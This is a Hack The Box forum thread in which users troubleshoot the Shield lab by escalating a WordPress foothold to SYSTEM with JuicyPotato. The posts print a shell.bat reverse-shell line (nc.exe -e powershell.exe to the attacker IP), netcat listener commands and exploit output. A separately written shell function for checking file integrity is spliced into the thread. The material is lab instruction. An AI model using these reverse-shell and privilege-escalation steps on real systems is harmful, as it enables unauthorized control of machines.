Starting Point: Shield, JuicyPotato and netcat

@Jade86 said:

@misentomanuel said:

I gave that command both on the terminal of my Kali and inside meterpreter. Found nothing :frowning:

Ok, that means that you don’t have the two exploits downloaded on your computer. What the walkthrough doesn’t tell you is that you have to download both nc.exe and JuicyPotato.exe on your machine first, and THEN upload them to the target machine. You can find both of them on GitHub.

https://imgur.com/SLMekBG.png what’s wrong?

https://imgur.com/Pvteh6T.png I have downloaded 2 files

@misentomanuel said:

https://imgur.com/SLMekBG.png what’s wrong?

You need to run the js.exe command not in the meterpreter window, but in the netcat session that you are running on port 1111.

@Jade86 said:

You need to run the js.exe command not in the meterpreter window, but in the netcat session that you are running on port 1111.

https://imgur.com/YfPnvei.png what’s wrong?

Are you sure I need to put a command in netcat???

ohhhhh it works finally, thanks!!

@misentomanuel said:

ohhhhh it works finally, thanks!!

cool!

@theTCP said:

If it makes anyone feel better, I spent 6+ hours trying to figure out what I was doing wrong, feeling like a dumbass, and it happened to be that I was downloading an empty JuicyPotato.exe because my browser was blocking it. CHECK THE FILE SIZE!

Thx man. You saved millions of my neurons.
It really works for me now.
I checked the size of Juicy.exe = 0 bytes ((((

hahahaha… What a dumbass I am! Oh, gosh! :slight_smile:

As @theTCP said, when I downloaded JuicyPotato to my machine, this bast@rd of a browser did not download the whole file. It was zero bytes!
So, I just took the URL again and downloaded it with ‘wget’.
I ran the command and got root. So, let me help with some tips:

  1. You can use the new directory created when you exploit WordPress with Metasploit. This directory’s name is a letter soup, like this (FyhXqieluV):
    [*] Executing the payload at /wordpress/wp-content/plugins/FyhXqieluV/lkoFdnjZGk.php…
    You will land in that kind of directory, so you do not have to go to ‘uploads’.

  2. Check that your downloaded JuicyPotato is not zero bytes. If it is, download it again. Its size is about 340 K.

  3. In your directory (the one I explained in item 1) you need to have the following files:
    a. nc.exe
    b. shell.bat
    c. js.exe
    The first one calls the other, then calls the last one. You need all three together in the directory.

  4. Before running JuicyPotato, you will need a new console with a new netcat opened. In the example this one listens on port 1111, and it is here that you will get System.
    So, go there, open a new console and run: nc -nlvp 1111
    But port 1111 needs to be declared in ‘shell.bat’.
    File’s content (shell.bat):
    START C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV\nc.exe -e powershell.exe 10.10.14.U-IP-HERE 1111

  5. When is port 1337 used?
    I dunno. I used this port in my JuicyPotato command, but the Windows system did not open it, as far as I could see.
    My results:
    –XX–
    C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>js.exe -t * -p .\shell.bat -l 1337
    js.exe -t * -p .\shell.bat -l 1337
    Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337

    [+] authresult 0
    {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
    [+] CreateProcessWithTokenW OK
    –XX–

    C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>netstat -na |findstr 1337
    netstat -na |findstr 1337

    C:\inetpub\wwwroot\wordpress\wp-content\plugins\ayjSfnMosV>
    –XX–

  6. And, on the new console (the third opened console) we will have the System account. This one will be opened by Windows PowerShell (PS):

root@kali:~/htb/juicy-potato# nc -nvlp 1111
listening on [any] 1111 …
connect to [U-IP-HERE] from (UNKNOWN) [10.10.10.29] 50077
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>

JuicyPotato (Rotten Potato) is pretty confusing and annoying in the beginning, but after you have success you will see it is pretty simple to understand and to execute.

Cya!
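The pitfall that comes up most in this thread (a browser silently saving a zero-byte or HTML-page "JuicyPotato.exe", see @theTCP's warning and tip 2 above) is easy to catch before you waste hours. The following is an added example, not code from the thread or from any of its posters: a small POSIX shell function for Kali that refuses a downloaded Windows binary if it is empty, does not start with the PE `MZ` header, or does not match a SHA-256 you took from a release page you trust. `EXPECTED_SHA256` is a placeholder; the function name and the sample files are my own constructions.

```shell
#!/bin/sh
# Added example (not from the thread): sanity-check a downloaded Windows
# binary before uploading it anywhere, so an empty or HTML "exe" is caught early.

# check_download FILE [EXPECTED_SHA256]
# Returns 0 when FILE is non-empty, starts with the 'MZ' DOS header every
# Windows executable carries, and (if a hash is given) matches it; 1 otherwise.
check_download() {
    file="$1"
    expected="$2"

    # -s is false for a missing file and for a zero-byte file
    if [ ! -s "$file" ]; then
        echo "FAIL: $file is missing or zero bytes (browser may have blocked it)" >&2
        return 1
    fi

    # Read the first two bytes; a blocked download often yields an HTML page instead
    magic=$(dd if="$file" bs=2 count=1 2>/dev/null)
    if [ "$magic" != "MZ" ]; then
        echo "FAIL: $file does not start with MZ; this is not a Windows executable" >&2
        return 1
    fi

    # Optional integrity check against a hash from a trusted release page
    if [ -n "$expected" ]; then
        actual=$(sha256sum "$file" | cut -d' ' -f1)
        if [ "$actual" != "$expected" ]; then
            echo "FAIL: sha256 mismatch for $file (got $actual)" >&2
            return 1
        fi
    fi

    echo "OK: $file ($(wc -c < "$file" | tr -d ' ') bytes)"
    return 0
}

# Usage (EXPECTED_SHA256 is a placeholder you replace with the published hash):
#   check_download ./JuicyPotato.exe "$EXPECTED_SHA256" || exit 1
```

Run it right after the `wget`, before any `upload` from meterpreter; a non-zero exit tells you to re-download rather than debug the rest of the chain.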

Hello!

I need help with this post: Starting Point - Shield - Challenges - Hack The Box :: Forums


[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
but no access.
Please help me figure out what I’m missing.

THX

There are quite a few doubts about this machine, that’s why I dared to make a video: Solución HTB Shield walkthrough JuicyPotato mimikatz - YouTube

dat slash trick ______

I was unaware that this explanation was on here, aha. I’ve been struggling with this for a few days. Finally got it on my own though, so I’m glad I didn’t know this was here, hahaha. Nice work everyone.

@karlitoxz Thank you for this. As someone new to HTB I found the walkthrough to be a bit out of sync with my tools and confusing. Following your instructions I was able to get on track. Much appreciated.